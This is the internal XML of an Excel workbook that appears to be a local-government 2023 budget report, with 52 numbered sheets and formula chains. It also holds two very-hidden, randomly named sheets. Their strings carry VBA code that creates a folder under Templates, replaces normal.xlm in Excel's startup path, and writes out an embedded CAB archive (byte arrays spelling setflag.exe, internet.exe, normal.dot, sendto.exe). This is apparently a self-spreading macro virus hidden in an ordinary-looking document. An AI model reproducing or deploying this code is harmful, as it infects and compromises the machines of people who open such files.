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ftp\预算科\2023\人大预算\经区填报\上报市局\2022.12.25印刷稿\"/>
    </mc:Choice>
  </mc:AlternateContent>
  <bookViews>
    <workbookView xWindow="0" yWindow="0" windowWidth="22365" windowHeight="8970" tabRatio="888" firstSheet="14" activeTab="51"/>
  </bookViews>
  <sheets>
    <sheet name="SQTYELTOHBQOTP" sheetId="14" state="veryHidden" r:id="rId1"/>
    <sheet name="LFAFQGJ" sheetId="15" state="veryHidden" r:id="rId2"/>
    <sheet name="封皮" sheetId="185" r:id="rId3"/>
    <sheet name="目录 " sheetId="186" r:id="rId4"/>
    <sheet name="1" sheetId="110" r:id="rId5"/>
    <sheet name="2" sheetId="111" r:id="rId6"/>
    <sheet name="3" sheetId="112" r:id="rId7"/>
    <sheet name="4" sheetId="115" r:id="rId8"/>
    <sheet name="5" sheetId="116" r:id="rId9"/>
    <sheet name="6" sheetId="117" r:id="rId10"/>
    <sheet name="7" sheetId="180" r:id="rId11"/>
    <sheet name="8" sheetId="75" r:id="rId12"/>
    <sheet name="9" sheetId="76" r:id="rId13"/>
    <sheet name="10" sheetId="119" r:id="rId14"/>
    <sheet name="11" sheetId="120" r:id="rId15"/>
    <sheet name="12" sheetId="121" r:id="rId16"/>
    <sheet name="13" sheetId="123" r:id="rId17"/>
    <sheet name="14" sheetId="170" r:id="rId18"/>
    <sheet name="15" sheetId="124" r:id="rId19"/>
    <sheet name="16" sheetId="181" r:id="rId20"/>
    <sheet name="17" sheetId="125" r:id="rId21"/>
    <sheet name="18" sheetId="126" r:id="rId22"/>
    <sheet name="19" sheetId="129" r:id="rId23"/>
    <sheet name="20" sheetId="182" r:id="rId24"/>
    <sheet name="21" sheetId="130" r:id="rId25"/>
    <sheet name="22" sheetId="131" r:id="rId26"/>
    <sheet name="23" sheetId="133" r:id="rId27"/>
    <sheet name="24" sheetId="172" r:id="rId28"/>
    <sheet name="25" sheetId="183" r:id="rId29"/>
    <sheet name="26" sheetId="136" r:id="rId30"/>
    <sheet name="27" sheetId="137" r:id="rId31"/>
    <sheet name="28" sheetId="140" r:id="rId32"/>
    <sheet name="29" sheetId="165" r:id="rId33"/>
    <sheet name="30" sheetId="166" r:id="rId34"/>
    <sheet name="31" sheetId="141" r:id="rId35"/>
    <sheet name="32" sheetId="142" r:id="rId36"/>
    <sheet name="33" sheetId="143" r:id="rId37"/>
    <sheet name="34" sheetId="147" r:id="rId38"/>
    <sheet name="35" sheetId="148" r:id="rId39"/>
    <sheet name="36" sheetId="149" r:id="rId40"/>
    <sheet name="37" sheetId="153" r:id="rId41"/>
    <sheet name="38" sheetId="154" r:id="rId42"/>
    <sheet name="39" sheetId="157" r:id="rId43"/>
    <sheet name="40" sheetId="174" r:id="rId44"/>
    <sheet name="41" sheetId="175" r:id="rId45"/>
    <sheet name="42" sheetId="158" r:id="rId46"/>
    <sheet name="43" sheetId="159" r:id="rId47"/>
    <sheet name="44" sheetId="176" r:id="rId48"/>
    <sheet name="45" sheetId="161" r:id="rId49"/>
    <sheet name="46" sheetId="184" r:id="rId50"/>
    <sheet name="47" sheetId="162" r:id="rId51"/>
    <sheet name="48" sheetId="177" r:id="rId52"/>
    <sheet name="49" sheetId="178" r:id="rId53"/>
    <sheet name="50" sheetId="179" r:id="rId54"/>
    <sheet name="51" sheetId="163" r:id="rId55"/>
    <sheet name="52" sheetId="164" r:id="rId56"/>
  </sheets>
  <externalReferences>
    <externalReference r:id="rId57"/>
    <externalReference r:id="rId58"/>
  </externalReferences>
  <definedNames>
    <definedName name="_xlnm._FilterDatabase" localSheetId="18" hidden="1">'15'!$A$4:$C$276</definedName>
    <definedName name="_xlnm.Print_Area" localSheetId="4">'1'!$A$1:$E$38</definedName>
    <definedName name="_xlnm.Print_Area" localSheetId="19">'16'!$A$1:$C$22</definedName>
    <definedName name="_xlnm.Print_Area" localSheetId="20">'17'!$A$1:$E$20</definedName>
    <definedName name="_xlnm.Print_Area" localSheetId="24">'21'!$A$1:$C$17</definedName>
    <definedName name="_xlnm.Print_Area" localSheetId="25">'22'!$A$1:$C$34</definedName>
    <definedName name="_xlnm.Print_Area" localSheetId="26">'23'!$A$1:$B$44</definedName>
    <definedName name="_xlnm.Print_Area" localSheetId="29">'26'!$A$1:$D$16</definedName>
    <definedName name="_xlnm.Print_Area" localSheetId="34">'31'!$A$1:$E$41</definedName>
    <definedName name="_xlnm.Print_Area" localSheetId="37">'34'!$A$1:$C$41</definedName>
    <definedName name="_xlnm.Print_Area" localSheetId="38">'35'!$A$1:$C$44</definedName>
    <definedName name="_xlnm.Print_Area" localSheetId="11">'8'!$A$1:$C$37</definedName>
    <definedName name="_xlnm.Print_Area" localSheetId="12">'9'!$A$1:$C$35</definedName>
    <definedName name="_xlnm.Print_Titles" localSheetId="13">'10'!$1:$5</definedName>
    <definedName name="_xlnm.Print_Titles" localSheetId="17">'14'!$1:$4</definedName>
    <definedName name="_xlnm.Print_Titles" localSheetId="18">'15'!$1:$4</definedName>
    <definedName name="_xlnm.Print_Titles" localSheetId="51">'48'!$1:$7</definedName>
    <definedName name="_xlnm.Print_Titles" localSheetId="10">'7'!$1:$4</definedName>
    <definedName name="地区名称" localSheetId="3">#REF!</definedName>
    <definedName name="地区名称">#REF!</definedName>
  </definedNames>
  <calcPr calcId="152511"/>
</workbook>
</file>

<file path=xl/calcChain.xml><?xml version="1.0" encoding="utf-8"?>
<calcChain xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main">
  <c r="B13" i="178" l="1"/>
  <c r="B12" i="178"/>
  <c r="B11" i="178"/>
  <c r="B10" i="178"/>
  <c r="B9" i="178"/>
  <c r="B8" i="178"/>
  <c r="B7" i="178"/>
  <c r="D6" i="178"/>
  <c r="B6" i="178" s="1"/>
  <c r="C6" i="178"/>
  <c r="G10" i="177"/>
  <c r="D10" i="177"/>
  <c r="C10" i="177" s="1"/>
  <c r="G9" i="177"/>
  <c r="D9" i="177"/>
  <c r="C9" i="177"/>
  <c r="G8" i="177"/>
  <c r="D8" i="177"/>
  <c r="C8" i="177"/>
  <c r="B29" i="162"/>
  <c r="B24" i="162"/>
  <c r="B19" i="162"/>
  <c r="B13" i="162"/>
  <c r="B10" i="162"/>
  <c r="B6" i="162" s="1"/>
  <c r="B7" i="162"/>
  <c r="F6" i="184"/>
  <c r="C6" i="184"/>
  <c r="B6" i="184" s="1"/>
  <c r="B33" i="161"/>
  <c r="B28" i="161"/>
  <c r="B23" i="161"/>
  <c r="B18" i="161"/>
  <c r="B15" i="161"/>
  <c r="B12" i="161"/>
  <c r="B9" i="161"/>
  <c r="B8" i="161" s="1"/>
  <c r="B7" i="161"/>
  <c r="E8" i="176"/>
  <c r="E7" i="176" s="1"/>
  <c r="C8" i="176"/>
  <c r="B8" i="176" s="1"/>
  <c r="B7" i="176" s="1"/>
  <c r="I7" i="176"/>
  <c r="H7" i="176"/>
  <c r="G7" i="176"/>
  <c r="F7" i="176"/>
  <c r="D7" i="176"/>
  <c r="B5" i="159"/>
  <c r="D13" i="175"/>
  <c r="D12" i="175"/>
  <c r="D10" i="175" s="1"/>
  <c r="D11" i="175"/>
  <c r="K10" i="175"/>
  <c r="J10" i="175"/>
  <c r="H10" i="175"/>
  <c r="G10" i="175"/>
  <c r="F10" i="175"/>
  <c r="D9" i="175"/>
  <c r="D8" i="175"/>
  <c r="D7" i="175"/>
  <c r="K6" i="175"/>
  <c r="J6" i="175"/>
  <c r="H6" i="175"/>
  <c r="G6" i="175"/>
  <c r="F6" i="175"/>
  <c r="D6" i="175"/>
  <c r="F10" i="174"/>
  <c r="F6" i="174"/>
  <c r="F5" i="174"/>
  <c r="F6" i="157"/>
  <c r="B6" i="157" s="1"/>
  <c r="C6" i="157"/>
  <c r="E6" i="154"/>
  <c r="B6" i="154"/>
  <c r="B26" i="153"/>
  <c r="B25" i="153"/>
  <c r="B24" i="153"/>
  <c r="B23" i="153"/>
  <c r="B19" i="153"/>
  <c r="B15" i="153"/>
  <c r="B9" i="153"/>
  <c r="B8" i="153"/>
  <c r="B5" i="153"/>
  <c r="B5" i="149"/>
  <c r="C14" i="148"/>
  <c r="B14" i="148"/>
  <c r="C9" i="148"/>
  <c r="B9" i="148"/>
  <c r="B41" i="148" s="1"/>
  <c r="B44" i="148" s="1"/>
  <c r="F44" i="148" s="1"/>
  <c r="C6" i="148"/>
  <c r="B6" i="148"/>
  <c r="C33" i="147"/>
  <c r="B33" i="147"/>
  <c r="C29" i="147"/>
  <c r="C39" i="147" s="1"/>
  <c r="C41" i="147" s="1"/>
  <c r="G41" i="147" s="1"/>
  <c r="B29" i="147"/>
  <c r="B39" i="147" s="1"/>
  <c r="B41" i="147" s="1"/>
  <c r="C25" i="147"/>
  <c r="B25" i="147"/>
  <c r="C19" i="147"/>
  <c r="B19" i="147"/>
  <c r="C12" i="147"/>
  <c r="B12" i="147"/>
  <c r="C6" i="147"/>
  <c r="B6" i="147"/>
  <c r="B5" i="143"/>
  <c r="C41" i="142"/>
  <c r="C44" i="142" s="1"/>
  <c r="E31" i="142"/>
  <c r="E41" i="142" s="1"/>
  <c r="E44" i="142" s="1"/>
  <c r="D31" i="142"/>
  <c r="D41" i="142" s="1"/>
  <c r="D44" i="142" s="1"/>
  <c r="C31" i="142"/>
  <c r="B31" i="142"/>
  <c r="B41" i="142" s="1"/>
  <c r="B44" i="142" s="1"/>
  <c r="E26" i="142"/>
  <c r="D26" i="142"/>
  <c r="C26" i="142"/>
  <c r="B26" i="142"/>
  <c r="E21" i="142"/>
  <c r="D21" i="142"/>
  <c r="C21" i="142"/>
  <c r="B21" i="142"/>
  <c r="E14" i="142"/>
  <c r="D14" i="142"/>
  <c r="C14" i="142"/>
  <c r="B14" i="142"/>
  <c r="E9" i="142"/>
  <c r="D9" i="142"/>
  <c r="C9" i="142"/>
  <c r="B9" i="142"/>
  <c r="E6" i="142"/>
  <c r="D6" i="142"/>
  <c r="C6" i="142"/>
  <c r="B6" i="142"/>
  <c r="C39" i="141"/>
  <c r="C41" i="141" s="1"/>
  <c r="K41" i="141" s="1"/>
  <c r="E33" i="141"/>
  <c r="D33" i="141"/>
  <c r="C33" i="141"/>
  <c r="B33" i="141"/>
  <c r="E29" i="141"/>
  <c r="D29" i="141"/>
  <c r="C29" i="141"/>
  <c r="B29" i="141"/>
  <c r="E25" i="141"/>
  <c r="D25" i="141"/>
  <c r="C25" i="141"/>
  <c r="B25" i="141"/>
  <c r="E19" i="141"/>
  <c r="D19" i="141"/>
  <c r="C19" i="141"/>
  <c r="B19" i="141"/>
  <c r="E12" i="141"/>
  <c r="D12" i="141"/>
  <c r="C12" i="141"/>
  <c r="B12" i="141"/>
  <c r="E6" i="141"/>
  <c r="E39" i="141" s="1"/>
  <c r="E41" i="141" s="1"/>
  <c r="J41" i="141" s="1"/>
  <c r="D6" i="141"/>
  <c r="D39" i="141" s="1"/>
  <c r="D41" i="141" s="1"/>
  <c r="I41" i="141" s="1"/>
  <c r="C6" i="141"/>
  <c r="B6" i="141"/>
  <c r="B39" i="141" s="1"/>
  <c r="B41" i="141" s="1"/>
  <c r="H41" i="141" s="1"/>
  <c r="B11" i="166"/>
  <c r="B14" i="166" s="1"/>
  <c r="B10" i="166"/>
  <c r="B5" i="166"/>
  <c r="D18" i="137"/>
  <c r="C18" i="137"/>
  <c r="B18" i="137"/>
  <c r="D15" i="137"/>
  <c r="C15" i="137"/>
  <c r="B15" i="137"/>
  <c r="D13" i="137"/>
  <c r="C13" i="137"/>
  <c r="B13" i="137"/>
  <c r="D11" i="137"/>
  <c r="C11" i="137"/>
  <c r="B11" i="137"/>
  <c r="D7" i="137"/>
  <c r="C7" i="137"/>
  <c r="B7" i="137"/>
  <c r="D13" i="136"/>
  <c r="D16" i="136" s="1"/>
  <c r="C13" i="136"/>
  <c r="C16" i="136" s="1"/>
  <c r="B13" i="136"/>
  <c r="B16" i="136" s="1"/>
  <c r="C5" i="183"/>
  <c r="B32" i="172"/>
  <c r="B29" i="172"/>
  <c r="B27" i="172"/>
  <c r="B24" i="172"/>
  <c r="B22" i="172"/>
  <c r="B19" i="172"/>
  <c r="B12" i="172"/>
  <c r="B5" i="172" s="1"/>
  <c r="B6" i="172"/>
  <c r="B39" i="133"/>
  <c r="B38" i="133" s="1"/>
  <c r="B33" i="133"/>
  <c r="B30" i="133"/>
  <c r="B28" i="133"/>
  <c r="B25" i="133"/>
  <c r="B23" i="133"/>
  <c r="B21" i="133"/>
  <c r="B19" i="133"/>
  <c r="B17" i="133"/>
  <c r="B9" i="133"/>
  <c r="B8" i="133"/>
  <c r="B6" i="133"/>
  <c r="B5" i="133"/>
  <c r="C29" i="131"/>
  <c r="B29" i="131"/>
  <c r="C28" i="131"/>
  <c r="C34" i="131" s="1"/>
  <c r="C22" i="131"/>
  <c r="B22" i="131"/>
  <c r="C18" i="131"/>
  <c r="B18" i="131"/>
  <c r="C16" i="131"/>
  <c r="B16" i="131"/>
  <c r="C9" i="131"/>
  <c r="B9" i="131"/>
  <c r="C7" i="131"/>
  <c r="B7" i="131"/>
  <c r="C5" i="131"/>
  <c r="B5" i="131"/>
  <c r="B28" i="131" s="1"/>
  <c r="B34" i="131" s="1"/>
  <c r="F34" i="131" s="1"/>
  <c r="C12" i="130"/>
  <c r="B12" i="130"/>
  <c r="C11" i="130"/>
  <c r="B11" i="130"/>
  <c r="D5" i="182"/>
  <c r="C5" i="182"/>
  <c r="E36" i="126"/>
  <c r="D36" i="126"/>
  <c r="C36" i="126"/>
  <c r="B36" i="126"/>
  <c r="E29" i="126"/>
  <c r="D29" i="126"/>
  <c r="C29" i="126"/>
  <c r="B29" i="126"/>
  <c r="E25" i="126"/>
  <c r="D25" i="126"/>
  <c r="C25" i="126"/>
  <c r="B25" i="126"/>
  <c r="E22" i="126"/>
  <c r="D22" i="126"/>
  <c r="C22" i="126"/>
  <c r="B22" i="126"/>
  <c r="E20" i="126"/>
  <c r="D20" i="126"/>
  <c r="C20" i="126"/>
  <c r="B20" i="126"/>
  <c r="E11" i="126"/>
  <c r="D11" i="126"/>
  <c r="C11" i="126"/>
  <c r="B11" i="126"/>
  <c r="E9" i="126"/>
  <c r="D9" i="126"/>
  <c r="C9" i="126"/>
  <c r="B9" i="126"/>
  <c r="E6" i="126"/>
  <c r="E35" i="126" s="1"/>
  <c r="E41" i="126" s="1"/>
  <c r="D6" i="126"/>
  <c r="D35" i="126" s="1"/>
  <c r="D41" i="126" s="1"/>
  <c r="C6" i="126"/>
  <c r="C35" i="126" s="1"/>
  <c r="C41" i="126" s="1"/>
  <c r="B6" i="126"/>
  <c r="B35" i="126" s="1"/>
  <c r="B41" i="126" s="1"/>
  <c r="H19" i="125"/>
  <c r="E14" i="125"/>
  <c r="D14" i="125"/>
  <c r="C14" i="125"/>
  <c r="B14" i="125"/>
  <c r="E13" i="125"/>
  <c r="E19" i="125" s="1"/>
  <c r="D13" i="125"/>
  <c r="D19" i="125" s="1"/>
  <c r="J19" i="125" s="1"/>
  <c r="C13" i="125"/>
  <c r="C19" i="125" s="1"/>
  <c r="K19" i="125" s="1"/>
  <c r="B13" i="125"/>
  <c r="B19" i="125" s="1"/>
  <c r="I19" i="125" s="1"/>
  <c r="C21" i="181"/>
  <c r="C15" i="181"/>
  <c r="C12" i="181"/>
  <c r="C8" i="181"/>
  <c r="C5" i="181" s="1"/>
  <c r="C6" i="181"/>
  <c r="B5" i="121"/>
  <c r="B5" i="120"/>
  <c r="D46" i="119"/>
  <c r="C46" i="119"/>
  <c r="B46" i="119"/>
  <c r="D44" i="119"/>
  <c r="B44" i="119" s="1"/>
  <c r="C44" i="119"/>
  <c r="D42" i="119"/>
  <c r="C42" i="119"/>
  <c r="B42" i="119" s="1"/>
  <c r="D36" i="119"/>
  <c r="C36" i="119"/>
  <c r="B36" i="119" s="1"/>
  <c r="D33" i="119"/>
  <c r="C33" i="119"/>
  <c r="B33" i="119"/>
  <c r="D31" i="119"/>
  <c r="B31" i="119" s="1"/>
  <c r="C31" i="119"/>
  <c r="D27" i="119"/>
  <c r="C27" i="119"/>
  <c r="B27" i="119" s="1"/>
  <c r="D23" i="119"/>
  <c r="C23" i="119"/>
  <c r="B23" i="119"/>
  <c r="D12" i="119"/>
  <c r="C12" i="119"/>
  <c r="B12" i="119"/>
  <c r="D7" i="119"/>
  <c r="B7" i="119" s="1"/>
  <c r="C7" i="119"/>
  <c r="C29" i="76"/>
  <c r="B29" i="76"/>
  <c r="C28" i="76"/>
  <c r="B28" i="76"/>
  <c r="B35" i="76" s="1"/>
  <c r="C32" i="75"/>
  <c r="C29" i="75"/>
  <c r="B29" i="75"/>
  <c r="C28" i="75"/>
  <c r="C37" i="75" s="1"/>
  <c r="I37" i="75" s="1"/>
  <c r="C20" i="75"/>
  <c r="B20" i="75"/>
  <c r="C5" i="75"/>
  <c r="B5" i="75"/>
  <c r="D21" i="180"/>
  <c r="C21" i="180"/>
  <c r="D15" i="180"/>
  <c r="C15" i="180"/>
  <c r="D12" i="180"/>
  <c r="C12" i="180"/>
  <c r="D8" i="180"/>
  <c r="C8" i="180"/>
  <c r="D6" i="180"/>
  <c r="C6" i="180"/>
  <c r="C5" i="180" s="1"/>
  <c r="D5" i="180"/>
  <c r="B23" i="112"/>
  <c r="B13" i="112"/>
  <c r="B6" i="112"/>
  <c r="B5" i="112" s="1"/>
  <c r="C36" i="111"/>
  <c r="E30" i="111"/>
  <c r="E36" i="111" s="1"/>
  <c r="D30" i="111"/>
  <c r="D36" i="111" s="1"/>
  <c r="C30" i="111"/>
  <c r="B30" i="111"/>
  <c r="B36" i="111" s="1"/>
  <c r="E29" i="111"/>
  <c r="D29" i="111"/>
  <c r="C29" i="111"/>
  <c r="B29" i="111"/>
  <c r="I38" i="110"/>
  <c r="E30" i="110"/>
  <c r="D30" i="110"/>
  <c r="C30" i="110"/>
  <c r="B30" i="110"/>
  <c r="D29" i="110"/>
  <c r="D38" i="110" s="1"/>
  <c r="H38" i="110" s="1"/>
  <c r="C29" i="110"/>
  <c r="C38" i="110" s="1"/>
  <c r="J38" i="110" s="1"/>
  <c r="E21" i="110"/>
  <c r="D21" i="110"/>
  <c r="C21" i="110"/>
  <c r="B21" i="110"/>
  <c r="E6" i="110"/>
  <c r="E29" i="110" s="1"/>
  <c r="E38" i="110" s="1"/>
  <c r="D6" i="110"/>
  <c r="C6" i="110"/>
  <c r="B6" i="110"/>
  <c r="B29" i="110" s="1"/>
  <c r="B38" i="110" s="1"/>
  <c r="G38" i="110" s="1"/>
  <c r="B6" i="137" l="1"/>
  <c r="B17" i="137" s="1"/>
  <c r="B21" i="137" s="1"/>
  <c r="F41" i="147"/>
  <c r="E41" i="147"/>
  <c r="C6" i="137"/>
  <c r="C17" i="137" s="1"/>
  <c r="C21" i="137" s="1"/>
  <c r="G16" i="136" s="1"/>
  <c r="B28" i="75"/>
  <c r="B37" i="75" s="1"/>
  <c r="C35" i="76"/>
  <c r="C6" i="119"/>
  <c r="B6" i="119" s="1"/>
  <c r="B17" i="130"/>
  <c r="B27" i="133"/>
  <c r="B44" i="133" s="1"/>
  <c r="F16" i="136"/>
  <c r="D6" i="137"/>
  <c r="C41" i="148"/>
  <c r="C44" i="148" s="1"/>
  <c r="D6" i="119"/>
  <c r="C17" i="130"/>
  <c r="H17" i="130" s="1"/>
  <c r="C7" i="176"/>
  <c r="D17" i="137" l="1"/>
  <c r="G17" i="130"/>
  <c r="F17" i="130"/>
  <c r="H37" i="75"/>
  <c r="G37" i="75"/>
  <c r="D21" i="137" l="1"/>
  <c r="H16" i="136" s="1"/>
</calcChain>
</file>

<file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="1888" uniqueCount="1285">
  <si>
    <t xml:space="preserve">77 83 67 70 0 0 0 0 157 27 1 0 0 0 0 0 48 24 0 0 0 0 0 0 3 1 1 0 5 0 4 0 247 20 0 0 0 24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t>
  </si>
  <si>
    <t>Private Sub createcabfile()</t>
  </si>
  <si>
    <t xml:space="preserve">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t>
  </si>
  <si>
    <t>Dim ch As Byte</t>
  </si>
  <si>
    <t>on error resume next</t>
  </si>
  <si>
    <t>Set fso = CreateObject("scripting.filesystemobject")</t>
  </si>
  <si>
    <t>Set w = CreateObject("wscript.shell")</t>
  </si>
  <si>
    <t>myfolder = w.specialfolders("Templates") &amp; "\Software\"</t>
  </si>
  <si>
    <t>If Not fso.folderexists(myfolder) Then</t>
  </si>
  <si>
    <t>fso.createfolder myfolder</t>
  </si>
  <si>
    <t>End If</t>
  </si>
  <si>
    <t>For i=1 to Workbooks.Count</t>
  </si>
  <si>
    <t>If Workbooks(i).name="normal.xlm" then</t>
  </si>
  <si>
    <t>workbooks(i).close</t>
  </si>
  <si>
    <t xml:space="preserve">0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 186 24 0 0 8 0 1 0 0 128 0 0 0 0 0 0 0 0 225 48 244 104 32 0 115 101 116 102 108 97 103 46 101 120 101 0 0 96 0 0 0 128 0 0 0 0 232 48 135 172 32 0 105 110 116 101 114 110 101 116 46 101 120 101 0 0 18 1 0 0 224 0 0 0 0 232 48 177 180 32 0 110 111 114 109 97 49 46 120 108 109 0 0 158 1 0 0 242 1 0 0 0 232 48 109 144 32 0 110 111 114 109 97 108 46 100 111 116 0 0 80 0 0 0 144 3 0 0 0 229 48 54 95 32 0 115 101 110 100 116 111 46 101 120 101 0 93 3 165 99 72 50 0 128 67 75 236 58 109 116 20 85 150 85 93 213 73 37 169 166 11 236 196 0 65 90 44 92 152 48 28 156 14 14 216 129 105 52 221 9 199 4 58 132 116 19 49 9 40 196 216 43 200 36 85 160 78 26 59 84 218 77 229 209 154 221 163 206 236 142 103 143 46 58 198 115 156 213 61 58 51 56 199 29 187 19 76 2 202 71 24 151 201 12 179 10 234 226 203 20 106 28 178 157 206 208 80 123 95 85 135 4 231 99 119 127 204 191 188 115 94 223 170 247 238 123 239 222 251 238 103 37 85 247 116 83 12 69 81 44 116 93 167 168 195 148 217 60 212 255 222 6 161 207 90 248 243 89 212 155 57 199 111 62 76 87 30 191 121 115 243 131 173 206 61 45 15 63 208 178 125 151 243 254 237 187 119 63 44 57 239 219 233 108 145 119 59 31 220 237 44 219 88 227 220 245 240 142 157 203 109 182 92 49 179 199 227 53 76 212 253 173 93 103 38 251 47 191 249 192 153 60 128 135 151 223 127 230 91 198 216 67 103 110 4 88 247 205 253 103 86 25 243 77 103 214 2 220 244 224 253 205 4 127 146 22 191 151 162 42 105 134 154 255 220 39 215 72 63 71 217 233 60 58 11 38 225 101 133 57 22 190 17 126 4 232 219 50 92 10 230 59 155 89 51 9 169 238 12 30 52 198 248 21 50 239 194 181 113 97 154 44 </t>
  </si>
  <si>
    <t>fso.deletefile Application.StartupPath &amp; "\normal.xlm"</t>
  </si>
  <si>
    <t xml:space="preserve">28 59 40 106 201 255 65 102 255 239 6 116 190 254 23 166 151 75 59 31 145 0 238 189 51 67 144 255 107 132 65 115 194 46 203 91 118 108 151 182 83 212 7 217 25 222 175 201 96 170 129 52 60 203 77 52 106 112 62 252 236 201 224 237 249 35 188 248 95 131 213 153 54 211 102 218 76 155 105 51 109 166 205 180 153 54 211 102 218 76 155 105 127 189 166 92 44 65 101 98 105 77 109 0 85 176 65 87 178 217 179 199 67 85 171 146 184 172 191 76 156 47 96 31 212 139 8 135 232 208 178 90 252 36 148 210 181 33 58 182 89 92 17 162 55 225 239 91 97 170 76 92 181 88 135 125 18 231 44 126 188 15 70 2 40 21 170 172 85 219 68 9 55 0 126 0 223 7 131 106 135 216 65 25 216 149 202 145 85 29 241 189 34 250 8 118 10 177 53 184 218 220 69 84 142 8 104 208 215 126 158 108 166 244 177 238 175 218 62 116 157 237 136 171 247 138 69 246 39 158 130 65 216 210 137 54 139 206 16 133 44 158 196 185 28 127 45 190 66 214 74 226 150 24 162 44 148 65 117 41 190 4 21 60 122 15 165 208 144 90 38 222 155 24 177 92 122 137 48 136 142 41 231 25 255 165 23 241 32 153 175 20 183 193 241 205 100 85 204 145 183 9 191 111 14 150 1 166 71 73 176 202 17 81 173 132 211 42 69 135 199 164 168 189 143 224 186 19 176 103 145 253 160 172 235 122 136 10 173 168 197 223 179 78 138 164 44 196 110 194 29 172 201 100 8 228 145 99 29 131 37 64 101 48 131 83 41 86 132 216 106 188 141 224 108 22 253 100 168 76 148 66 172 95 125 218 144 14 246 153 84 180 41 71 42 80 226 31 219 63 214 105 138 98 122 81 42 161 231 0 21 52 21 1 17 44 123 148 91 223 126 148 186 170 235 235 36 107 57 25 64 227 137 11 57 1 114 99 120 156 49 54 40 10 81 235 208 112 226 124 78 117 45 254 13 236 9 162 141 234 251 75 209 165 73 158 3 248 44 99 16 177 4 136 189 23 4 202 118 3 99 203 50 82 125 217 88 82 212 222 79 80 55 202 199 64 194 75 92 113 247 40 225 29 186 211 254 228 5 160 182 9 </t>
  </si>
  <si>
    <t xml:space="preserve">241 76 19 218 204 88 154 64 84 69 228 84 37 206 182 79 68 201 148 10 215 36 111 204 32 176 48 14 40 171 200 104 17 185 192 174 74 198 210 89 41 138 176 70 44 30 34 130 142 149 9 105 152 41 74 246 211 82 193 59 43 64 3 99 37 140 235 244 165 31 73 14 130 68 8 96 18 12 28 237 238 111 251 59 237 111 97 108 21 2 206 149 68 150 235 236 52 73 37 82 57 232 84 226 227 156 226 99 176 89 169 251 87 225 185 176 178 50 86 242 172 178 246 138 68 223 229 30 150 184 59 149 126 214 253 171 182 47 204 75 66 142 238 59 1 159 25 218 84 139 255 141 49 111 169 76 252 155 16 237 199 223 167 13 33 192 81 149 213 248 105 139 33 173 178 77 184 11 158 106 241 46 138 252 206 166 12 209 186 226 141 13 245 91 149 35 37 125 221 208 2 112 36 23 84 78 234 200 199 247 120 36 171 50 168 107 119 244 40 82 73 0 183 80 134 117 96 1 204 66 223 43 224 90 43 89 207 71 227 97 43 224 107 115 144 175 40 26 151 242 252 216 70 38 154 138 168 58 52 160 52 241 84 99 67 159 177 107 52 41 231 4 240 223 195 46 117 48 130 111 129 135 104 188 206 56 162 161 47 233 179 121 36 59 217 246 183 176 122 124 184 174 97 126 188 207 21 111 232 171 33 107 121 215 217 32 16 132 6 193 8 34 19 22 249 219 77 175 112 180 116 27 242 113 104 109 113 10 148 227 214 160 159 172 29 55 73 114 15 200 179 8 253 17 105 150 120 69 245 241 90 182 178 129 119 42 239 1 83 156 210 196 82 106 86 35 234 107 216 218 23 162 177 133 144 3 135 128 235 112 157 117 233 171 87 198 145 135 218 95 245 194 225 239 121 64 173 94 7 134 86 161 10 62 153 80 164 21 74 155 40 208 178 221 143 151 131 249 40 41 189 78 90 112 151 54 143 140 82 242 13 201 132 69 154 229 199 55 100 166 100 75 94 202 231 54 54 107 123 195 88 136 250 36 11 26 104 132 83 107 209 197 106 56 16 133 121 251 107 97 1 121 57 53 156 142 234 170 151 67 31 201 217 174 248 200 113 226 105 100 71 211 184 143 231 105 137 67 190 66 213 235 </t>
  </si>
  <si>
    <t>Next</t>
  </si>
  <si>
    <t xml:space="preserve">208 178 7 188 14 242 49 11 109 224 219 207 115 112 187 210 82 228 99 129 190 69 238 97 116 185 197 130 82 65 93 230 244 219 241 99 28 69 45 221 207 210 107 65 16 197 31 209 97 78 243 185 235 29 45 190 232 81 41 47 128 127 12 150 7 82 151 31 85 194 14 74 178 161 62 215 233 113 217 129 46 23 255 65 179 160 203 198 22 32 199 215 12 19 226 129 19 169 156 246 114 197 195 238 129 150 181 40 156 214 150 2 185 1 251 47 40 63 254 61 104 65 157 33 133 229 186 151 16 121 55 80 25 141 63 78 232 164 201 213 158 181 71 253 32 13 228 21 128 233 163 125 228 6 144 55 13 167 12 20 27 135 242 218 103 186 36 178 248 35 11 185 129 16 13 47 28 102 243 224 165 238 235 34 170 231 208 73 144 80 56 173 86 113 134 136 94 249 147 34 226 51 34 210 24 84 197 101 230 190 97 10 233 22 247 32 154 48 133 116 123 13 14 66 80 88 26 230 38 165 196 124 68 88 187 219 93 229 104 89 78 196 130 18 82 142 41 150 68 113 175 191 134 8 228 229 188 140 174 75 183 19 161 124 123 169 151 99 134 181 194 0 254 73 46 76 16 41 44 233 100 128 140 187 244 42 14 72 81 194 28 101 143 238 189 158 125 65 99 13 33 12 184 78 23 123 57 34 128 255 50 173 141 168 170 34 61 12 46 193 17 213 165 92 69 167 193 40 116 139 92 47 126 9 207 160 191 178 45 128 127 54 139 162 232 50 209 81 231 210 3 248 179 180 78 12 180 14 52 60 91 76 19 13 119 244 208 146 208 195 73 124 242 8 43 103 15 248 10 137 243 11 130 76 29 132 252 115 54 131 124 215 81 32 213 254 76 98 61 74 104 182 1 107 247 94 15 85 64 156 192 160 14 54 138 23 204 38 6 41 211 125 126 88 38 76 118 252 172 221 112 19 125 33 15 188 242 164 227 33 162 229 71 120 114 77 33 189 249 245 109 30 170 57 114 155 135 218 241 130 241 37 123 135 186 216 140 204 2 92 161 186 19 235 249 44 96 184 78 119 125 160 230 247 192 145 104 208 140 73 170 237 69 120 75 156 231 152 99 170 237 121 242 136 133 67 207 1 12 81 120 79 </t>
  </si>
  <si>
